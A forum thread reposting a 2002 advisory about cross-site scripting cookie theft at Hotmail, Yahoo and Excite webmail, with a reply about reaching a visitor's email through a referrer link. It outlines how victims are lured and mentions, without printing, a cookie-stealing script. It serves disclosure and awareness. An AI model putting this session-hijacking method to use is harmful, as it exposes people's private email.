Web-mail vulnerability

[Pieter_Arntz]

This is an excerpt from an article I found at: www.dsinet.org

"
-------------------------------------------------------
XSS/Cookie problems at major (webmail) sites Advisory
-------------------------------------------------------

XSS/Cookie problems at major (webmail) sites
13/11/02
- by "N|ghtHawk" Thijs Bosschert (nighthawk_at_hackers4hackers.org)

----------------------
Introduction:
----------------------

After finding a XSS/Cookie bug in the lycos.com mail site[0], I
wondered if it was the only site with those problems. I found out
that more sites got the same problem. This advisory gives three
other sites to show the problem, and explains what the problem is.


----------------------
Vendor Information:
----------------------

Homepage : http://www.hotmail.com
Vendor informed
About bug : -
Mailed advisory: 11/11/02
Vender Response : none (yet?)
Status : Cookie capturing still possible


Homepage : http://www.yahoo.com
Vendor informed
About bug : 03/11/02
Mailed advisory: 03/11/02
Vender Response : none (yet?)
Status : Cookie capturing still possible


Homepage : http://www.excite.com
Vendor informed
About bug : 11/11/02
Mailed advisory: 11/11/02
Vender Response : 1 autoreply
Status : Cookie capturing still possible


----------------------
Affected Versions:
----------------------

Tested on:
- hotmail.com webmail
- yahoo.com Webmail
- excite.com webmail

Not tested on:
- Other MSN/Passport services
- Other yahoo services
- Other excite services


----------------------
Description:
----------------------


What is Hotmail?
-------------

- http://www.hotmail.com
- Hotmail is the world's largest provider of free, Web-based
e-mail. It is based on the premise that e-mail access
should be easy and possible from any computer connected to
the World Wide Web. Hotmail eliminates the disparities
among e-mail programs by adhering to the universal Hypertext
Transfer Protocol (HTTP) standard. Sending and receiving
e-mail from Hotmail is easy: go to the Hotmail Web site at
http://www.hotmail.com or click the Hotmail link at
http://www.msn.com, sign in, and send an e-mail message. By
using a Web browser as a universal e-mail program, Hotmail
lets you stay connected anywhere in the world.


What is Yahoo?
-------------

- http://www.yahoo.com/

- "Yahoo currently provides users with access to a rich
collection of resources, including, various communications
tools, forums, shopping services, personalized content and
branded programming through its network of properties (the
"Service"). "


- http://mail.yahoo.com

- "Yahoo! Mail is one of the Internet's most popular free
e-mail services.
Access your e-mail account from anywhere
With Yahoo! Mail, you have access to your email from any
Internet-connected computer in the world. Whether you are
at a cafe, in a library, at work or at home, with Yahoo!
Mail, your email address is the same and your account is
accessible from all locations. "


What is Excite?
-------------

- http://www.excite.com
- Excite is a multi-purpose service which allows you to use
or access a wealth of products and services, including
e-mail, search services, chat rooms and bulletin boards,
shopping services, news, financial information and broad
range of other content (collectively the "Excite Service").


----------------------
Vulnerability:
----------------------

All of the above named sites use cookies with their mailservices.
Also do these sites have more than one service, and for the
different services have different hostnames/servers.

The problem in this is that with finding a XSS bug in one of the
many services there could be made a XSS request to get the cookie
of the mailservice.

----------------------
Exploit:
----------------------

The XSS bugs can be exploited by letting people click a link in an email.
Other ways to exploit this are:
- Giving people links through instant messengers.
- Put javascript in any homepage, which will open the xss bug.
Can be exploited for example in:
- Not good filtered forums
- Not good filtered guestbooks
- Give people a url which will redirect them to the XSS bug.

And people can think of other ways as well, actually it isn't
really safe to surf on the internet with a webmail account if
the servers aren't fully secure.

All the links above are going to a perl script. This script
(rompigema.pl) will get the cookie and the referrer of the 'victim',
then it will make a request to the server to get the frontpage,
inbox or an email from the 'victim'.

----------------------
Patch:
----------------------

Well, it's up to the sites to patch this. It would be a good idea
to not put insecure scripts on a server which uses the same
cookies as your mailsystem.
Also I really think an idea like HttpOnly[1] would be a good start
in getting rid of all the XSS bugs."


As always: watch out what you click,

Pieter

[JayK]

Hmm I don't know about this vulnerability, but once, I managed to access the webemail of a visitor who visited my site from an email in his mail,following the referrer allowed me to acces his email account. I didn't even realise what was happening until where, because I have the habit of randomly checking unfamilar referrers.


It was yahoomail. I'm guessing this is a problem for most web-based emails, espically if the user does not log out properly and it hasn't timed out..

I've read about it before but to see it actually happen was a eyeopener to say the least.